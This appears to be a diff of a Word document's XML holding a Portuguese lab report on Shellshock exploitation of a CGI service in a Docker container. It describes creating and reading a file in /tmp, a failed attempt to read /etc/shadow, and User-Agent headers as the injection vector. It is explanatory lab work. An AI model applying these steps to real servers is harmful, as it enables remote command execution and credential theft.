+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Leitura remota do ficheiro criado (via outro payload que execute cat /tmp/evidence_file.txt)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Abertura de um shell no container (ex: docker exec -it shellshock bash) para ler /tmp/evidence_file.txt.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Evidências recolhidas:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> que mostra o payload injetado / terminal com o comando curl (para melhor rastreabilidade). (Inserir imagem: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>evidence_created_file.jpg</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> — posicionado imediatamente após a descrição do payload.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Verificação da existência e conteúdo do ficheiro:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Após a criação, a presença e o conteúdo do ficheiro foram confirmados).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26E38F62" wp14:editId="2EFABFD1">
+            <wp:extent cx="5562600" cy="1960245"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="155223230" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="155223230" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5562600" cy="1960245"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> conteúdo/listagem do ficheiro /tmp/evidence_file.txt. (Inserir imagem: evidence_file_existence_and_content.jpg — posicionado imediatamente após a frase seguinte.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Legenda sugerida</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>: “Confirmação da existência e conteúdo do ficheiro criado em /tmp.”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head3"/>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
           <w:b/>
           <w:bCs w:val="0"/>
           <w:i w:val="0"/>
           <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
@@ -2609,7 +2088,18 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> e demonstrar a sua existência</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs w:val="0"/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Acesso a /etc/shadow</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2626,13 +2116,13 @@
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>Objetivo:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Demonstrar capacidade de escrita e persistência de artefactos no sistema.</w:t>
+        <w:t>Análise:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> O ficheiro /etc/shadow é restrito a root; o processo web corre com privilégios reduzidos. Assim, tentativas diretas de leitura via Shellshock resultam normalmente em erro de permissão.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2640,74 +2130,217 @@
         <w:pStyle w:val="Para"/>
         <w:ind w:firstLine="0"/>
         <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>um excerto de tentativa falhada (se existir) — ou apenas referenciar que a tentativa foi feita sem sucesso.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Conclusão:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Não foi possível obter /etc/shadow a partir do contexto do serviço web, devido a permissões.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head3"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs w:val="0"/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs w:val="0"/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs w:val="0"/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Query string vs cabeçalhos HTTP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>Payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Observação prática:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A query string é disponibilizada ao CGI na variável QUERY_STRING (por exemplo a=1&amp;b=2), como mostra evidence_query_string_on_header.txt. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pequeno excerto dessa saída para ilustrar (1–2 linhas). (Inserir bloco de texto: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> de criação</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (exemplo enviado em</w:t>
-      </w:r>
+        <w:t>evidence_query_string_on_header.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> — posicionar imediatamente após este parágrafo.)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Legenda sugerida:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “Excerto de getenv.cgi mostrando QUERY_STRING — ilustração de que a query string chega como única variável QUERY_STRING.”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>User-Agent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>Conclusão prática:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> O vector fiável para Shellshock em CGI é um cabeçalho HTTP (ex: User-Agent) porque o CGI converte cabeçalhos em variáveis HTTP_*, as quais podem conter a definição de função maliciosa. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2715,16 +2348,14 @@
         <w:pStyle w:val="ParaContinue"/>
         <w:ind w:firstLine="0"/>
         <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Colocar o payload na query string raramente funciona; por isso, as explorações documentadas usaram cabeçalhos HTTP.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2732,41 +2363,41 @@
         <w:pStyle w:val="ParaContinue"/>
         <w:ind w:firstLine="0"/>
         <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Riscos identificados e medidas de mitigação</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
         <w:ind w:firstLine="0"/>
         <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
           <w:b/>
           <w:bCs/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
+      <w:r>
+        <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>Verificação</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>Riscos principais:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2777,71 +2408,14 @@
           <w:numId w:val="19"/>
         </w:numPr>
         <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Leitura remota do ficheiro criado (via outro </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> que execute </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>cat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>/evidence_file.txt)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>;</w:t>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Execução remota de comandos com os privilégios do processo web → exfiltração de informação e criação de ficheiros.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2852,1155 +2426,14 @@
           <w:numId w:val="19"/>
         </w:numPr>
         <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Abertura</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de um shell no container (ex: docker exec -it shellshock bash) para </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>ler</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>/evidence_file.txt.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Evidências recolhidas:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> que mostra o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> injetado / terminal com o comando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>curl</w:t>
